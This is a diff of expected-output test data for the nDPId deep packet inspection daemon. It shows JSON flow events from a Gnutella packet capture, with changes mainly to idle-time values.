-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.98.115.128","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.98.115.128","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551890,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551890,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":371838,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":371838,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.65.70.197","src_port":28681,"dst_port":21693,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.65.70.197","src_port":28681,"dst_port":21693,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551701,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.192.231.237","src_port":28681,"dst_port":9676,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551701,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.192.231.237","src_port":28681,"dst_port":9676,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71539,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.169.2.153","src_port":28681,"dst_port":52414,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4185,65 +4185,65 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.197.111.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 